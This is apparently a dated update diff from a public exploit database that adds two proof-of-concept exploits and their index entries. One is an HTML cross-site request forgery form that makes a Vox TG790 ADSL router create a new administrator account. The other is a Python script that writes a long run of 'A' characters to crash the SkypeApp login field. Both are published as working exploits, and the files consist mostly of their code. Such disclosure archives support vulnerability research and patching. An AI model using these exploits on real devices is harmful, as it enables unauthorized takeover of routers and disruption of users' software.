DB: 2018-08-25

2 changes to exploits/shellcodes

SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)

Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)

exploits/hardware/webapps/45252.txt

@@ -0,0 +1,27 @@
+# Title: Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
+# Author: Cakes
+# Exploit Date: 2018-08-01
+# Vendor: Vox Telecom
+# Link: https://www.vox.co.za/
+# Firmware Version: 6.2.W.1
+# CVE: N/A
+
+# Description
+# Due to improper session management low privilege users are able to create 
+# administrator accounts through a crafted POST request. 
+
+# PoC
+
+<html>
+<form action="https://TARGET/cgi/b/users/cfg/usraccedit/?be=0&l0=2&l1=9&tid=ADD_USER" method="POST">
+<input type="hidden" name="0" id="0" value="10">
+<input type="hidden" name="1" id="1" value="usrAccApply">
+<input type="hidden" name="34" id="34" value="LulzCakes">
+<input type="hidden" name="36" id="36" value="1">
+<input type="text" name="33" id="33" placeholder="Account Name">
+<br />
+<input type="text" name="31" id="31" value="Administrator">
+<br />
+<input type="submit" value="W00ts">
+</form>
+</html>

exploits/windows_x86-64/dos/45251.py

@@ -0,0 +1,22 @@
+# Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-08-23
+# Vendor Homepage: https://www.skype.com/es/home/
+# Tested Version: 12.8.487.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python SkypeApp_12.8.487.0.py
+# 2.- Open SkypeApp_12.8.487.0.txt and copy content to clipboard
+# 3.- Open SkypeApp.exe
+# 4.- Paste ClipBoard on "Cuenta de Skype o Microsoft"
+# 5.- Siguiente
+# 6.- Crashed
+
+#!/usr/bin/env python
+ 
+buffer = "\x41" * 65225
+f = open ("SkypeApp_12.8.487.0.txt", "w")
+f.write(buffer)
+f.close()

files_exploits.csv

@@ -6066,6 +6066,7 @@ id,file,description,date,author,type,platform,port
 45245,exploits/windows_x86/dos/45245.py,"Softdisk 3.0.3 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86,
 45246,exploits/windows_x86-64/dos/45246.py,"CuteFTP 8.3.1 - Denial of Service (PoC)",2018-08-23,"Ali Alipour",dos,windows_x86-64,
 45249,exploits/linux/dos/45249.txt,"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)",2018-08-23,"Dhiraj Mishra",dos,linux,
+45251,exploits/windows_x86-64/dos/45251.py,"SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)",2018-08-24,"Luis Martínez",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39852,3 +39853,4 @@ id,file,description,date,author,type,platform,port
 45242,exploits/hardware/webapps/45242.txt,"Geutebrueck re_porter 16 - Cross-Site Scripting",2018-08-22,"Kamil Suska",webapps,hardware,
 45247,exploits/php/webapps/45247.txt,"Twitter-Clone 1 - 'code' SQL Injection",2018-08-23,L0RD,webapps,php,
 45248,exploits/windows/webapps/45248.txt,"PCViewer vt1000 - Directory Traversal",2018-08-23,"Berk Dusunur",webapps,windows,
+45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,